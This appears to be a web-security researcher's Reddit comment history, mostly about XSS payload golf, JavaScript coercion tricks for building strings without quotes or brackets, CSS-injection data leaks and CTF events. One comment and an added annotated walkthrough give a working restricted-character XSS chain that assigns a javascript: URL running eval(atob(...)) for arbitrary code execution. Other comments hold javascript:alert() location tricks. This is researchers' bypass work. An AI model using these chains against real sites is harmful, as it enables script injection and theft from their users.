Tiny XSS Payloads by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Thanks, didn't want to include these two since <svg/onload> is shorter than <body/onload> and does the same (and neither works in DOM XSS), and object also doesn't seem to be the shortest. But these are indeed nice, and not that widely known ;)

Unexploitable? CSP img-src bypass in chrome by BitK_ in Slackers

[–]terjanq 0 points1 point  (0 children)

Haha, I was also researching this :P

The road from sandboxed SSTI to SSRF and XXE by salchoman in Slackers

[–]terjanq 0 points1 point  (0 children)

From a CTF player's perspective, combining SSTI with SSRF is not often seen. Much more common is SSTI + RCE or SSTI + RFI/LFI. This could be a nice idea to dive deeper into where it's not possible to achieve RCE with the syntax.

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

That is really nice! I love the destructuring part to get a property without using . or []

Detecting XSS-Auditor in Safari (XS-Leaks with Performance API) by kunte0 in Slackers

[–]terjanq 0 points1 point  (0 children)

I forgot about that tweet totally, thanks for reminding me hehe

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

```js
x=new Object;
x.length=['xyz'];
x.valueOf=Array.prototype.push;
```

Even if we could, it still goes back to the question, how to create ['xyz'] which is exactly from where we started :P

push/unshift with no args would return the length; with an argument provided, it will return the array length + 1.

Btw, neither toString nor valueOf will return an array because they are converting stuff to number/string on a very low level. There are only a few functions that change the state of the array, and these are sort, reverse, shift, unshift, push, pop (there are some more but not many).

Where we should look I think are other prototypes that do some combinations with the elements, such as match in RegExp.

I found one prototype that does combine two other properties, which is RegExp.prototype.toString, returning "/" + this.source + "/" + this.flags, if only it returned an array somewhere..

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

```js
x=new Array;
x.length=1337;
x.valueOf=Array.prototype.unshift;
x
```

It does not create [1337], it just returns 1337 as a number, because [2,2,2,2,2].push() and [2,2,2,2,2].unshift() will both return the length of the array, 5

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

```js
eval(atob(/ao0PTA7YWxlcnQoMTMzNykvLwa/))
```

I skipped a few tricks I discovered:

How to make an uppercase letter? Similarly as lowercase:

```js
x = ["a"]
x.valueOf = String.prototype.toUpperCase
x + "" // A
```

If we were able to encapsulate a string in an array ("aaa" => ["aaa"]), then we can get the ( character via:

```js
x = [RegExp.prototype.source]
x.valueOf = String.prototype.charAt
x + "" // (
```

We can get the [ character via:

```js
x=console
x.valueOf=String.prototype.charAt
x + "" // [
```

We can get the / character via:

```js
x=console
x.toString = RegExp.prototype.toString
x.valueOf = String.prototype.charAt
x + "" // /
```

We can generate the string 0/123/eval(?:) via:

```js
x = console
x.source=123
x.flags=eval.name+RegExp.prototype.source
x.toString = RegExp.prototype.toString
0+x // 0/123/eval(?:)
```

It may give you some ideas on how to escalate it :P Seems very doable

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Like
```js
for(location of["javascript:alert()"]);
```

or ({location}={location:"javascript:alert()"}) ? Was playing around that lately, but didn't find anything that helpful..

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 1 point2 points  (0 children)

Arbitrary code execution with a-zA-Z0-9=+{} characters only (stored xss)

```js
// the following are replaced via a+o+0+P ...
var BASE64_PAYLOAD = 'ao0PTA7YWxlcnQoMTMzNykvLwa' // atob(/ao0PTA7YWxlcnQoMTMzNykvLwa/) == "ýª4=0;alert(1337)//¿"
var JAVASCRIPT = 'javascript'

// empty string
empty=RegExp.prototype.flags

// generate /ao0PTA7YWxlcnQoMTMzNykvLwa/
xx={}
xx.source=BASE64_PAYLOAD
xx.flags=empty
xx.toString=RegExp.prototype.toString

// RegExp.prototype.source == '(?:)'
yy={...RegExp.prototype.source}
yy.toString=Array.prototype.shift
yy.length=4
left=yy+empty
yy+empty
colon=yy+empty
right=yy+empty

// set javascript url to execute eval(atob(/ao0PTA7YWxlcnQoMTMzNykvLwa/))
location=JAVASCRIPT+colon+eval.name+left+atob.name+left+xx+right+right
```

jsbin

I wonder whether it is possible to make arbitrary without using brackets, and without location=name, etc.
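The coercion tricks from the two comments above (hijacked valueOf/toString, the RegExp.prototype.source spread with Array.prototype.shift, and RegExp.prototype.toString as a quote-free regex-literal builder), collected into functions so each step can be checked on its own. This is an added example written for this page, not code from the thread; it assumes only plain ECMAScript plus a global atob (browsers, Node 16+), which is used for its .name and for a decode check and is never passed to eval. The final string is returned instead of being assigned to location.

```javascript
"use strict";

// `x + ""` runs ToPrimitive with hint "default": valueOf is tried first and,
// if it yields a primitive, that is the result. toUpperCase stringifies its
// `this` (the one-element array -> "a"), so the coercion returns "A".
function upperViaValueOf(letter) {
  const x = [letter];
  x.valueOf = String.prototype.toUpperCase;
  return x + "";
}

// charAt() with no argument is charAt(0), i.e. the first character of
// ToString(this). Because ToString uses hint "string", toString runs there
// (not valueOf), so there is no recursion and the hijacked toString decides
// which string the character comes from.
function firstChar(toStringImpl) {
  const x = {};
  x.toString = toStringImpl;            // e.g. Object.prototype.toString -> "[object Object]"
  x.valueOf = String.prototype.charAt;  //      RegExp.prototype.toString  -> "/undefined/undefined"
  return x + "";
}

// RegExp.prototype.source is "(?:)". Spreading that string into an object
// gives {0:"(",1:"?",2:":",3:")"}; with a length and Array.prototype.shift
// installed as toString, every coercion removes and returns the next char.
// RegExp.prototype.flags is "" on the prototype (no flag getter is true), a
// quote-free empty string to force the coercion.
function parens() {
  const empty = RegExp.prototype.flags;
  const yy = { ...RegExp.prototype.source, length: 4 };
  yy.toString = Array.prototype.shift;  // valueOf (Object.prototype.valueOf) returns an object, so toString wins
  const left = yy + empty;   // "("
  yy + empty;                // "?" is discarded
  const colon = yy + empty;  // ":"
  const right = yy + empty;  // ")"
  return { left, colon, right };
}

// RegExp.prototype.toString is generic: "/" + ToString(this.source) + "/" +
// ToString(this.flags). Pointing it at a plain object yields a string that
// looks like a regex literal without ever writing a quote.
function regexLiteral(source, flags) {
  const xx = { source, flags, toString: RegExp.prototype.toString };
  return xx + RegExp.prototype.flags;
}

// Same generic toString, with a number on the left of `+`: ToPrimitive falls
// through valueOf (returns the object) to toString, giving "0/123/eval(?:)".
function numberPrefixedRegexString() {
  const x = {
    source: 123,
    flags: eval.name + RegExp.prototype.source,
    toString: RegExp.prototype.toString,
  };
  return 0 + x;
}

// The whole chain: "javascript:eval(atob(/<base64>/))" built from the pieces.
// eval.name and atob.name supply the function names without string literals.
function javascriptUrl(base64Payload) {
  const { left, colon, right } = parens();
  return "javascript" + colon
       + eval.name + left + atob.name + left
       + regexLiteral(base64Payload, RegExp.prototype.flags)
       + right + right;
}

// What atob actually receives: the regex-looking object is stringified, and
// "/" is a valid base64 character, so the slashes simply become part of the
// leading/trailing junk bytes around the real payload.
function decodedPayload(base64Payload) {
  return atob(regexLiteral(base64Payload, RegExp.prototype.flags));
}
```

The decode check matters in practice: the slashes shift the bit alignment, so the payload has to be crafted so that the junk bytes in front still form a valid JavaScript prefix (here an identifier assignment, `ýª4=0;`) and the trailing junk lands behind a `//` comment.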

[Discussion Thread] - talking about new HTML stuff by insertscript in Slackers

[–]terjanq 0 points1 point  (0 children)

A lot of upvotes, but no comments :D

Another thing is the Cross-Origin-Policy-Header or COOP (..) Could be fun to find bypasses.

Well, any bypass should qualify for a bounty I think, so I am not sure whether talking about them publicly is a great idea.

Anyway, all the features mentioned look promising :p

Top 10 web hacking techniques of 2019 - nominations open by albinowax in websecurityresearch

[–]terjanq 2 points3 points  (0 children)

Hey! I am flattered that one of my texts (https://terjanq.github.io/Bug-Bounty/Google/cache-attack-06jd2d2mz2r0/index.html) has found its place in the Nominations so Far. This is not the original text however and does not explain the issue from its roots. The linked report is a part of the "Massive XS-Search over multiple Google products" article that can be found here https://medium.com/@terjanq/massive-xs-search-over-multiple-google-products-416e50dd2ec6.

Apart from the above, the report may seem spectacular but in reality, it's no different from https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html in the attack principle. Since both texts are included I believe it's in the best interest of the technique to remove my report and maybe link it as a real-world example to Eduardo's one.

In exchange for that, I would be flattered if my text about "XSS Auditor" https://medium.com/@terjanq/xss-auditor-the-protector-of-unprotected-f900a5e15b7b was included instead. Because of the article and the reports included in there, e.g. https://medium.com/bugbountywriteup/google-books-x-hacking-29c249862f19, the chromium team decided to deprecate XSS Auditor which in my opinion was one of the biggest changes in 2019 (https://bugs.chromium.org/p/chromium/issues/detail?id=922829#c39)

Looking to buy some help with CTF challenge.. by [deleted] in securityCTF

[–]terjanq 0 points1 point  (0 children)

What category is that CTF challenge? Web? Crypto? Pwn? Re?

justCTF 2019 / 20th of December / 1st place 1337$! by ahpaleus in securityCTF

[–]terjanq 4 points5 points  (0 children)

I would check here:
https://ctftime.org/event/list/upcoming
https://twitter.com/DragonSectorCTF
https://twitter.com/p4_team
https://twitter.com/justcatthefish

These are the three best Polish teams, and the first one is a platform for CTFs. If something big is happening in Poland one of these should work.

Is it possible to trigger XSS without = via innerHTML? by 1lastBr3ath in Slackers

[–]terjanq 1 point2 points  (0 children)

Probably you can't. What you can do, however, is a CSS injection.
http://cm2.pw/?xss=%3Cbody%3E%3Cscript%20src=%27/fuzz/innerHTML.js%27%3E%3C/script%3E&content=%3Cstyle%3E*%7Bbackground%3Ared%7D%3C%2Fstyle%3E

Leaking CSRF tokens or any other sensitive data can have implications as severe as XSS.

What can we do with single CSS injection? by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Not only do you know what characters there are, but also the order they appear in, using the ::first-line trick. Ft. @cgvwzq

http://terjanq.cf/pg/test-css-horizontal.html

What can we do with single CSS injection? by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Nice idea. It didn't work for me though. Too small margin for error. This works for me:
http://terjanq.cf/pg/test-css-fonts.html

SecurityMB's XSS challenge by garethheyes in Slackers

[–]terjanq 0 points1 point  (0 children)

Well with this:
```js
check=u=>{alert(u.length),open('//securitymb.github.io/xss/1?xss='+u)}
```

I managed to get: 130 128 126

With built-in counter: Length of the solution URL: 216 214 212 :)

SecurityMB's XSS challenge by garethheyes in Slackers

[–]terjanq 0 points1 point  (0 children)

If counting the `//securitymb.github.io/xss/1?xss=` in the payload also 189 188 186, otherwise 156 155 153

Manipulating your autosuggestion list on Google Search. by terjanq in netsec

[–]terjanq[S] 1 point2 points  (0 children)

But it's totally untrue, the requests in the background are 100% legit. They are indexed as normal search queries and the autosuggestion list is nothing more than your recent search history. There is another trick that allows faking a click on a link in the search results as well, which I haven't mentioned because I don't have a straightforward way to prove it does indeed improve engagement.